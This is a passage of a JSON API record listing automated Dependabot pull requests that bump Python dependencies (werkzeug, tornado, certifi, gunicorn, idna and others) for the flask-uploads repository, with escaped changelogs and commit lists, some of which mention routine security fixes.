3.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/50cfeebcb0727e18cc52ffbeb125f4a66551179b\"\u003e\u003ccode\u003e50cfeeb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/8760275afb72bd10b57d92cb4d52abf759b2f3a7\"\u003e\u003ccode\u003e8760275\u003c/code\u003e\u003c/a\u003e apply max_form_memory_size another level up in the parser\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/8d6a12e2af542a553853c870d106884a3cd1f73b\"\u003e\u003ccode\u003e8d6a12e\u003c/code\u003e\u003c/a\u003e start version 3.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/a7b121abc781b9a6557ca204f23247db654d0253\"\u003e\u003ccode\u003ea7b121a\u003c/code\u003e\u003c/a\u003e release version 3.0.5 (\u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2961\"\u003e#2961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/9caf72ac060181a3171d91fd12279e071df430ca\"\u003e\u003ccode\u003e9caf72a\u003c/code\u003e\u003c/a\u003e release version 3.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/e28a2451e99457ce71e460af276a02f27a3bdba1\"\u003e\u003ccode\u003ee28a245\u003c/code\u003e\u003c/a\u003e catch OSError from getpass.getuser (\u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2960\"\u003e#2960\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/e6b4cce97eef17716004625bcf6754fa930f2618\"\u003e\u003ccode\u003ee6b4cce\u003c/code\u003e\u003c/a\u003e catch OSError from getpass.getuser\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/werkzeug/compare/0.8.3...3.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tornado` from 2.3 to 6.5\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tornadoweb/tornado/blob/master/docs/releases.rst\"\u003etornado's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease notes\u003c/h1\u003e\n\u003cp\u003e.. toctree::\n:maxdepth: 2\u003c/p\u003e\n\u003cp\u003ereleases/v6.5.1\nreleases/v6.5.0\nreleases/v6.4.2\nreleases/v6.4.1\nreleases/v6.4.0\nreleases/v6.3.3\nreleases/v6.3.2\nreleases/v6.3.1\nreleases/v6.3.0\nreleases/v6.2.0\nreleases/v6.1.0\nreleases/v6.0.4\nreleases/v6.0.3\nreleases/v6.0.2\nreleases/v6.0.1\nreleases/v6.0.0\nreleases/v5.1.1\nreleases/v5.1.0\nreleases/v5.0.2\nreleases/v5.0.1\nreleases/v5.0.0\nreleases/v4.5.3\nreleases/v4.5.2\nreleases/v4.5.1\nreleases/v4.5.0\nreleases/v4.4.3\nreleases/v4.4.2\nreleases/v4.4.1\nreleases/v4.4.0\nreleases/v4.3.0\nreleases/v4.2.1\nreleases/v4.2.0\nreleases/v4.1.0\nreleases/v4.0.2\nreleases/v4.0.1\nreleases/v4.0.0\nreleases/v3.2.2\nreleases/v3.2.1\nreleases/v3.2.0\nreleases/v3.1.1\nreleases/v3.1.0\nreleases/v3.0.2\nreleases/v3.0.1\nreleases/v3.0.0\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/ab5f35431242f95a5ef0a2ac228e54e89ab511f0\"\u003e\u003ccode\u003eab5f354\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3498\"\u003e#3498\u003c/a\u003e from bdarnell/final-6.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/3623024dfc36ea4955ba06c41dd1e63487e65473\"\u003e\u003ccode\u003e3623024\u003c/code\u003e\u003c/a\u003e Final release notes for 6.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/b39b892bf78fe8fea01dd45199aa88307e7162f3\"\u003e\u003ccode\u003eb39b892\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3497\"\u003e#3497\u003c/a\u003e from bdarnell/multipart-log-spam\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/cc61050e8f26697463142d99864b562e8470b41d\"\u003e\u003ccode\u003ecc61050\u003c/code\u003e\u003c/a\u003e httputil: Raise errors instead of logging in multipart/form-data parsing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/ae4a4e4feafc631c3dba64c3fbe185d05c37e356\"\u003e\u003ccode\u003eae4a4e4\u003c/code\u003e\u003c/a\u003e asyncio: Preserve contextvars across SelectorThread on Windows (\u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3479\"\u003e#3479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/197ff13f768b9abd26b0ecb97989bdd40283c345\"\u003e\u003ccode\u003e197ff13\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3496\"\u003e#3496\u003c/a\u003e from bdarnell/undeprecate-set-event-loop\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/c3d906c4ad05c2719f9e9c7a1f103e925b4bbc3a\"\u003e\u003ccode\u003ec3d906c\u003c/code\u003e\u003c/a\u003e requirements: Upgrade tox to 4.26.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/a83897732e1b3f52406930448604c236d5dfbf64\"\u003e\u003ccode\u003ea838977\u003c/code\u003e\u003c/a\u003e testing: Remove deprecation warning filter for set_event_loop\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/d8e0d36ebad1a042866a9355959e99e0bf90a3c0\"\u003e\u003ccode\u003ed8e0d36\u003c/code\u003e\u003c/a\u003e build: Fix free-threaded build, mark speedups module as no-GIL\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tornadoweb/tornado/commit/bfe748948581fff5fef41d6297bcf5baf6915dd6\"\u003e\u003ccode\u003ebfe7489\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/tornadoweb/tornado/issues/3492\"\u003e#3492\u003c/a\u003e from bdarnell/relnotes-6.5\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/tornadoweb/tornado/compare/v2.3.0...v6.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/xqliu/flask-uploads/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/xqliu/flask-uploads/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/xqliu%2Fflask-uploads/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"2653577153","node_id":"PR_kwDOHkKvz86eKl_B","number":1,"state":"open","title":"Bump the pip group across 1 directory with 10 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-07-09T17:44:21.000Z","updated_at":"2025-07-09T17:44:22.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":10,"packages":[{"name":"certifi","old_version":"2020.6.20","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"gunicorn","old_version":"20.0.4","new_version":"23.0.0","repository_url":"https://github.com/benoitc/gunicorn"},{"name":"idna","old_version":"2.10","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"pillow","old_version":"8.2.0","new_version":"10.3.0","repository_url":"https://github.com/python-pillow/Pillow"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.24.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"sqlparse","old_version":"0.3.1","new_version":"0.5.0","repository_url":"https://github.com/andialbrecht/sqlparse"},{"name":"urllib3","old_version":"1.26.5","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"zipp","old_version":"3.3.0","new_version":"3.19.1","repository_url":"https://github.com/jaraco/zipp"},{"name":"celery","old_version":"4.1.0","new_version":"5.5.3","repository_url":"https://github.com/celery/celery"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 10 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.6.20` | `2024.7.4` |\n| [gunicorn](https://github.com/benoitc/gunicorn) | `20.0.4` | `23.0.0` |\n| [idna](https://github.com/kjd/idna) | `2.10` | `3.7` |\n| [pillow](https://github.com/python-pillow/Pillow) | `8.2.0` | `10.3.0` |\n| [py](https://github.com/pytest-dev/py) | `1.10.0` | `1.11.0` |\n| [requests](https://github.com/psf/requests) | `2.24.0` | `2.32.4` |\n| [sqlparse](https://github.com/andialbrecht/sqlparse) | `0.3.1` | `0.5.0` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.26.5` | `2.5.0` |\n| [zipp](https://github.com/jaraco/zipp) | `3.3.0` | `3.19.1` |\n| [celery](https://github.com/celery/celery) | `4.1.0` | `5.5.3` |\n\n\nUpdates `certifi` from 2020.6.20 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.06.20...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gunicorn` from 20.0.4 to 23.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/benoitc/gunicorn/releases\"\u003egunicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e23.0.0\u003c/h2\u003e\n\u003cp\u003eGunicorn 23.0.0 has been released. This version improve HTTP 1.1. support and  which improve safety\u003c/p\u003e\n\u003cp\u003eYou're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003ch1\u003e23.0.0 - 2024-08-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eminor docs fixes (:pr:\u003ccode\u003e3217\u003c/code\u003e, :pr:\u003ccode\u003e3089\u003c/code\u003e, :pr:\u003ccode\u003e3167\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eworker_class parameter accepts a class (:pr:\u003ccode\u003e3079\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003efix deadlock if request terminated during chunked parsing (:pr:\u003ccode\u003e2688\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit receiving Transfer-Encodings: compress, deflate, gzip (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit Transfer-Encoding headers specifying multiple encodings. note: no parameters, still (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003esdist generation now explicitly excludes sphinx build folder (:pr:\u003ccode\u003e3257\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003edecode bytes-typed status (as can be passed by gevent) as utf-8 instead of raising \u003ccode\u003eTypeError\u003c/code\u003e (:pr:\u003ccode\u003e2336\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eraise correct Exception when encounting invalid chunked requests (:pr:\u003ccode\u003e3258\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003ethe SCRIPT_NAME and PATH_INFO headers, when received from allowed forwarders, are no longer restricted for containing an underscore (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003einclude IPv6 loopback address \u003ccode\u003e[::1]\u003c/code\u003e in default for :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e and :ref:\u003ccode\u003eproxy-allow-ips\u003c/code\u003e (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** NOTE **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SCRIPT_NAME change mitigates a regression that appeared first in the 22.0.0 release\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e setting if you are still not seeing the SCRIPT_NAME transmitted\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarder-headers\u003c/code\u003e setting if you are missing headers after upgrading from a version prior to 22.0.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** Breaking changes **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefuse requests where the uri field is empty (:pr:\u003ccode\u003e3255\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003erefuse requests with invalid CR/LR/NUL in heade field values (:pr:\u003ccode\u003e3253\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eremove temporary \u003ccode\u003e--tolerate-dangerous-framing\u003c/code\u003e switch from 22.0 (:pr:\u003ccode\u003e3260\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eIf any of the breaking changes affect you, be aware that now refused requests can post a security problem, especially so in setups involving request pipe-lining and/or proxies.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eFix CVE-2024-1135\u003c/p\u003e\n\u003ch2\u003eGunicorn 22.0 has been released\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eGunicorn 22.0.0 has been released.\u003c/strong\u003e This version fix the numerous security vulnerabilities. You're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003cp\u003eChanges:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e22.0.0 - 2024-04-17\n===================\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003eutime\u003c/code\u003e to notify workers liveness\u003c/li\u003e\n\u003cli\u003emigrate setup to pyproject.toml\u003c/li\u003e\n\u003cli\u003efix numerous security vulnerabilities in HTTP parser (closing some request smuggling vectors)\u003c/li\u003e\n\u003cli\u003eparsing additional requests is no longer attempted past unsupported request framing\u003c/li\u003e\n\u003cli\u003eon HTTP versions \u0026lt; 1.1 support for chunked transfer is refused (only used in exploits)\u003c/li\u003e\n\u003cli\u003erequests conflicting configured or passed SCRIPT_NAME now produce a verbose error\u003c/li\u003e\n\u003cli\u003eTrailer fields are no longer inspected for headers indicating secure scheme\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/411986d6191114dd1d1bbb9c72c948dbf0ef0425\"\u003e\u003ccode\u003e411986d\u003c/code\u003e\u003c/a\u003e fix doc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/334392e7795f2017e83f7054d372422512d6f4b6\"\u003e\u003ccode\u003e334392e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2559\"\u003e#2559\u003c/a\u003e from laggardkernel/bugfix/reexec-env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/e75c3533e32f91a9dceba9e8e1341fea5540ba81\"\u003e\u003ccode\u003ee75c353\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3189\"\u003e#3189\u003c/a\u003e from pajod/patch-py36\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/9357b28dd867950e33ca3864207cb35a1eb8ba6f\"\u003e\u003ccode\u003e9357b28\u003c/code\u003e\u003c/a\u003e keep document user in access_log_format setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/79fdef0822cbfe7e16b659b07230af9be098d5fc\"\u003e\u003ccode\u003e79fdef0\u003c/code\u003e\u003c/a\u003e bump to 23.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/3acd9fbfd1159ca3cd80a8052ada89a0bf27f806\"\u003e\u003ccode\u003e3acd9fb\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2620\"\u003e#2620\u003c/a\u003e from talkerbox/improve-access-log-format-docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/3f56d76548e4ade034bf5e174737902970285d1f\"\u003e\u003ccode\u003e3f56d76\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3192\"\u003e#3192\u003c/a\u003e from pajod/patch-allowed-script-name\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/256d474a7910bd605f2cc8c082b79c1ae55215a9\"\u003e\u003ccode\u003e256d474\u003c/code\u003e\u003c/a\u003e docs: revert duped directive\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/ffa48b581dcaa75f17fd2df263515e4266feeef6\"\u003e\u003ccode\u003effa48b5\u003c/code\u003e\u003c/a\u003e test: default change was intentional\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/52538ca9070b5e7ead5d0fa731e82a622dc6f3ee\"\u003e\u003ccode\u003e52538ca\u003c/code\u003e\u003c/a\u003e docs: recommend SCRIPT_NAME=/subfolder\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/benoitc/gunicorn/compare/20.0.4...23.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.10 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into 